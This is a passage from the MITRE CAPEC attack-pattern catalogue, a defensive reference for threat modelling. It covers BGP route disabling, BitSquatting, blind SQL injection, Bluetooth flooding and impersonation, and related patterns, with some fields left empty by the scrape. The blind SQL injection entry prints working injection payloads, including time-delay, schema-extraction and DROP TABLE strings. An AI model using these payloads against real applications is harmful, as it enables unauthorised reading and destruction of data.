Content History

Submissions
Submission Date	Submitter	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)
Modifications
Modification Date	Modifier	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Example_Instances

CAPEC-584: BGP Route Disabling

Attack Pattern ID: 584

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	582	Route Disabling

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Manipulate System Resources

Prerequisites

The adversary must have control of a router that can modify, drop, or introduce spoofed BGP updates.The adversary can convince

Resources Required

BGP Router

Consequences

Scope	Impact	Likelihood
Availability	Other

Mitigations

Implement Ingress filters to check the validity of received routes. However, this relies on the accuracy of Internet Routing Registries (IRRs) databases which are often not well-maintained.

Implement Secure BGP (S-BGP protocol), which improves authorization and authentication capabilities based on public-key cryptography.

Example Instances

Blackholing: The adversary intentionally references false routing advertisements in order to attract traffic to a particular router so it can be dropped.

Related Weaknesses

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-465] "Why is it Taking so Long to Secure Internet Routing?". ACM. 2014. <https://queue.acm.org/detail.cfm?id=2668966>.

[REF-466] "Beware of BGP Attacks". ACM SIGCOMM. 2004. <http://www.cc.gatech.edu/~dovrolis/Papers/ccr-bgp.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2017-01-12 (Version 2.9)	Seamus Tuohy
2017-01-12 (Version 2.9)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations

CAPEC-611: BitSquatting

Attack Pattern ID: 611

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	616	Establish Rogue Location
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	98	Phishing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	89	Pharming
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	543	Counterfeit Websites

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Determine target website: The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.
Techniques
Research popular or high traffic websites.

Experiment

Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the BitSquatted URL.
Techniques
Register the BitSquatted domain.

Exploit

Wait for a user to visit the domain: Finally, the adversary simply waits for a user to be unintentionally directed to the BitSquatted domain.
Techniques
Simply wait for an error in memory to occur, redirecting the user to the malicious domain.

Prerequisites

An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets.

Skills Required

[Level: Low]

Adversaries must be able to register DNS hostnames/URL’s.

Consequences

Scope	Impact	Likelihood
Other	Other

Mitigations

Authenticate all servers and perform redundant checks when using DNS hostnames.

When possible, use error-correcting (ECC) memory in local devices as non-ECC memory is significantly more vulnerable to faults.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-485] Artem Dinaburg. "Bitsquatting: DNS Hijacking without exploitation". Raytheon. <http://media.blackhat.com/bh-us-11/Dinaburg/BH_US_11_Dinaburg_Bitsquatting_WP.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Architectural_Paradigms, Attack_Motivation-Consequences, Attack_Phases, Attack_Prerequisites, Description, Description Summary, Methods_of_Attack, Typical_Likelihood_of_Exploit, Typical_Severity
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns

CAPEC-189: Black Box Reverse Engineering

Attack Pattern ID: 189

Abstraction: Standard

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	188	Reverse Engineering
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	621	Analysis of Packet Timing and Sizes
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	622	Electromagnetic Side-Channel Attack
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	623	Compromising Emanations Attack

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Physical Security
Mechanisms of Attack	Collect and Analyze Information

Resources Required

Black box methods require (at minimum) the ability to interact with the functional boundaries where the software communicates with a larger processing environment, such as inter-process communication on a host operating system, or via networking protocols.

Related Weaknesses

CWE-ID	Weakness Name
203	Observable Discrepancy
1255	Comparison Logic is Vulnerable to Power Side-Channel Attacks
1300	Improper Protection of Physical Side Channels

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Activation_Zone, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Resources_Required
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Software Reverse Engineering

CAPEC-7: Blind SQL Injection

Attack Pattern ID: 7

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	66	SQL Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Hypothesize SQL queries in application:
Generated hypotheses regarding the SQL queries in an application. For example, the adversary may hypothesize that their input is passed directly into a query that looks like:
"SELECT * FROM orders WHERE ordernum = _____"

or

"SELECT * FROM orders WHERE ordernum IN (_____)"

or

"SELECT * FROM orders WHERE ordernum in (_____) ORDER BY _____"
Of course, there are many other possibilities.
Techniques
Research types of SQL queries and determine which ones could be used at various places in an application.

Determine how to inject information into the queries:

Determine how to inject information into the queries from the previous step such that the injection does not impact their logic. For example, the following are possible injections for those queries:

"5' OR 1=1; --"

and

"5) OR 1=1; --"

and

"ordernum DESC; --"

Techniques
Add clauses to the SQL queries such that the query logic does not change.
Add delays to the SQL queries in case server does not provide clear error messages (e.g. WAITFOR DELAY '0:0:10' in SQL Server or BENCHMARK(1000000000,MD5(1) in MySQL). If these can be injected into the queries, then the length of time that the server takes to respond reveals whether the query is injectable or not.

Experiment

Determine user-controllable input susceptible to injection: Determine the user-controllable input susceptible to injection. For each user-controllable input that the adversary suspects is vulnerable to SQL injection, attempt to inject the values determined in the previous step. If an error does not occur, then the adversary knows that the SQL injection was successful.

Techniques
Use web browser to inject input through text fields or through HTTP GET parameters.
Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
Use network-level packet injection tools such as netcat to inject input
Use modified client (modified by reverse engineering) to inject input.

Determine database type: Determines the type of the database, such as MS SQL Server or Oracle or MySQL, using logical conditions as part of the injected queries

Techniques
Try injecting a string containing char(0x31)=char(0x31) (this evaluates to 1=1 in SQL Server only)
Try injecting a string containing 0x313D31 (this evaluates to 1=1 in MySQL only)
Inject other database-specific commands into input fields susceptible to SQL Injection. The adversary can determine the type of database that is running by checking whether the query executed successfully or not (i.e. whether the adversary received a normal response from the server or not).

Exploit

Extract information about database schema: Extract information about database schema by getting the database to answer yes/no questions about the schema.
Techniques
Automatically extract database schema using a tool such as Absinthe.
Manually perform the blind SQL Injection to extract desired information about the database schema.
Exploit SQL Injection vulnerability: Use the information obtained in the previous steps to successfully inject the database in order to bypass checks or modify, add, retrieve or delete data from the database
Techniques
Use information about how to inject commands into SQL queries as well as information about the database schema to execute attacks such as dropping tables, inserting records, etc.

Prerequisites

SQL queries used by the application to store, retrieve or modify data.

User-controllable input that is not properly validated by the application as part of SQL queries.

Skills Required

[Level: Medium]

Determining the database type and version, as well as the right number and type of parameters to the query being injected in the absence of error messages requires greater skill than reverse-engineering database error messages.

Resources Required

None: No specialized resources are required to execute this type of attack.

Indicators

The only indicators of successful Blind SQL Injection are the application or database logs that show similar queries with slightly differing logical conditions that increase in complexity over time. However, this requires extensive logging as well as knowledge of the queries that can be used to perform such injection and return meaningful information from the database.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

Security by Obscurity is not a solution to preventing SQL Injection. Rather than suppress error messages and exceptions, the application must handle them gracefully, returning either a custom error page or redirecting the user to a default page, without revealing any information about the database or the application internals.

Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(') or SQL-comments (--) based on the context in which they appear.

Example Instances

An adversary may try entering something like "username' AND 1=1; --" in an input field. If the result is the same as when the adversary entered "username" in the field, then the adversary knows that the application is vulnerable to SQL Injection. The adversary can then ask yes/no questions from the database server to extract information from it. For example, the adversary can extract table names from a database using the following types of queries:

"username' AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108".

If the above query executes properly, then the adversary knows that the first character in a table name in the database is a letter between m and z. If it doesn't, then the adversary knows that the character must be between a and l (assuming of course that table names only contain alphabetic characters). By performing a binary search on all character positions, the adversary can determine all table names in the database. Subsequently, the adversary may execute an actual attack and send something like:

"username'; DROP TABLE trades; --

In the PHP application TimeSheet 1.1, an adversary can successfully retrieve username and password hashes from the database using Blind SQL Injection. If the adversary is aware of the local path structure, the adversary can also remotely execute arbitrary code and write the output of the injected queries to the local path. Blind SQL Injection is possible since the application does not properly sanitize the $_POST['username'] variable in the login.php file. See also: CVE-2006-4705

Related Weaknesses

CWE-ID	Weakness Name
89	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
209	Generation of Error Message Containing Sensitive Information
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
20	Improper Input Validation
697	Incorrect Comparison
707	Improper Neutralization

Taxonomy Mappings

Relevant to the OWASP taxonomy mapping

Entry Name
Blind SQL Injection

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Description, Description Summary, Examples-Instances, Payload_Activation_Impact, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References, Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances, Execution_Flow

CAPEC-96: Block Access to Libraries

Attack Pattern ID: 96

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	603	Blockage

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Execution Flow

Explore

Determine what external libraries the application accesses.

Experiment

Block access to the external libraries accessed by the application.
Monitor the behavior of the system to see if it goes into an insecure/inconsistent state.
If the system does go into an insecure/inconsistent state, leverage that to obtain information about the system functionality or data, elevate access control, etc. The rest of this attack will depend on the context and the desired goal.

Prerequisites

An application requires access to external libraries.

An attacker has the privileges to block application access to external libraries.

Skills Required

[Level: Low]

Knowledge of how to block access to libraries, as well as knowledge of how to leverage the resulting state of the application based on the failed call.

Consequences

Scope	Impact	Likelihood
Availability	Alter Execution Logic
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism

Mitigations

Ensure that application handles situations where access to APIs in external libraries is not available securely. If the application cannot continue its execution safely it should fail in a consistent and secure fashion.

Example Instances

A web-based system uses a third party cryptographic random number generation library that derives entropy from machine's hardware. This library is used in generation of user session ids used by the application. If the library is inaccessible, the application instead uses a software based weak pseudo random number generation library. An attacker of the system blocks access of the application to the third party cryptographic random number generation library (by renaming it). The application in turn uses the weak pseudo random number generation library to generate session ids that are predictable. An attacker then leverages this weakness to guess a session id of another user to perform a horizontal elevation of privilege escalation and gain access to another user's account.

Related Weaknesses

CWE-ID	Weakness Name
589	Call to Non-ubiquitous API

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses

CAPEC-571: Block Logging to Central Repository

Attack Pattern ID: 571

Abstraction: Standard

View customized information:

Description

An adversary prevents host-generated logs being delivered to a central location in an attempt to hide indicators of compromise.

Extended Description

In the case of network based reporting of indicators, an adversary may block traffic associated with reporting to prevent central station analysis. This may be accomplished by many means such as stopping a local process to creating a host-based firewall rule to block traffic to a specific server.

In the case of local based reporting of indicators, an adversary may block delivery of locally-generated log files themselves to the central repository.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	161	Infrastructure Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Manipulate System Resources

Related Weaknesses

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1562.002	Impair Defenses: Disable Windows Event Logging
1562.002	Impair Defenses: Impair Command History Logging
1562.006	Impair Defenses: Indicator Blocking
1562.008	Impair Defenses: Disable Cloud Logs

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References, Typical_Severity
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description, Extended_Description, Taxonomy_Mappings

CAPEC-603: Blockage

Attack Pattern ID: 603

Abstraction: Standard

View customized information:

Description

An adversary blocks the delivery of an important system resource causing the system to fail or stop working.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	607	Obstruction
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	96	Block Access to Libraries
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	589	DNS Blocking
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	590	IP Address Blocking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Manipulate System Resources

Prerequisites

This attack pattern requires knowledge of where important system resources are logically located as well as how they operate.

Consequences

Scope	Impact	Likelihood
Availability	Other

Related Weaknesses

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Typical_Likelihood_of_Exploit, Typical_Severity
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-5: Blue Boxing

Attack Pattern ID: 5

Abstraction: Detailed

View customized information:

Description

This attack pattern is included in CAPEC for historical purposes.

Likelihood Of Attack

Medium

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	220	Client-Server Protocol Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

System must use weak authentication mechanisms for administrative functions.

Skills Required

[Level: Low]

Given a vulnerable phone system, the attackers' technical vector relies on attacks that are well documented in cracker 'zines and have been around for decades.

Resources Required

CCITT-5 or other vulnerable lines, with the ability to send tones such as combined 2,400 Hz and 2,600 Hz tones to the switch

Consequences

Scope	Impact	Likelihood
Availability	Resource Consumption
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Implementation: Upgrade phone lines. Note this may be prohibitively expensive

Use strong access control such as two factor access control for administrative access to the switch

Example Instances

An adversary identifies a vulnerable CCITT-5 phone line, and sends a combination tone to the switch in order to request administrative access. Based on tone and timing parameters the request is verified for access to the switch. Once the adversary has gained control of the switch launching calls, routing calls, and a whole host of opportunities are available.

Related Weaknesses

CWE-ID	Weakness Name
285	Improper Authorization

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated @Status, Description

CAPEC-666: BlueSmacking

Attack Pattern ID: 666

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	125	Flooding

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Scan for Bluetooth Enabled Devices: Using BlueZ along with an antenna, an adversary searches for devices with Bluetooth on.
Techniques
Note the MAC address of the device you want to attack.

Experiment

Change L2CAP Packet Length: The adversary must change the L2CAP packet length to create packets that will overwhelm a Bluetooth enabled device.
Techniques
An adversary downloads and installs BlueZ, the standard Bluetooth utility package for Linux.

Exploit

Flood: An adversary sends the packets to the target device, and floods it until performance is degraded.

Prerequisites

The system/application has Bluetooth enabled.

Skills Required

[Level: Low]

An adversary only needs a Linux machine along with a Bluetooth adapter, which is extremely common.

Indicators

Performance is degraded or halted by incoming L2CAP packets.

Consequences

Scope	Impact	Likelihood
Availability	Unreliable Execution Resource Consumption

Mitigations

Disable Bluetooth when not being used.

When using Bluetooth, set it to hidden or non-discoverable mode.

Related Weaknesses

CWE-ID	Weakness Name
404	Improper Resource Shutdown or Release

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1498.001	Network Denial of Service: Direct Network Flood
1499.001	Endpoint Denial of Service: OS Exhaustion Flood

References

[REF-655] Amrita Mitra. "What is BlueSmack Attack?". The Security Buddy. 2017-03-08. <https://www.thesecuritybuddy.com/bluetooth-security/what-is-bluesmack-attack/>. URL validated: 2021-06-11.

Content History

Submissions
Submission Date	Submitter	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)
Modifications
Modification Date	Modifier	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-667: Bluetooth Impersonation AttackS (BIAS)

Attack Pattern ID: 667

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	616	Establish Rogue Location
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	194	Fake the Source of Data

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Find disguise and target: The adversary starts the Bluetooth service on the attacking device and searches for nearby listening devices.
Techniques
Knowledge of a trusted MAC address.
Scanning for devices other than the target that may be trusted.

Experiment

Disguise: Using the MAC address of the device the adversary wants to impersonate, they may use a tool such as spooftooth or macchanger to spoof their Bluetooth address and attempt to authenticate with the target.

Exploit

Use device capabilities to accomplish goal: Finally, if authenticated successfully the adversary can perform tasks/information gathering dependent on the target's capabilities and connections.

Prerequisites

Knowledge of a target device's list of trusted connections.

Skills Required

[Level: Low]

Adversaries must be capable of using command line Linux tools.

[Level: Low]

Adversaries must be in close proximity to Bluetooth devices.

Consequences

Scope	Impact	Likelihood
Integrity
Confidentiality

Mitigations

Disable Bluetooth in public places.

Verify incoming Bluetooth connections; do not automatically trust.

Change default PIN passwords and always use one when connecting.

Related Weaknesses

CWE-ID	Weakness Name
290	Authentication Bypass by Spoofing

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)
Modifications
Modification Date	Modifier	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns

CAPEC-472: Browser Fingerprinting

Attack Pattern ID: 472

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	541	Application Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
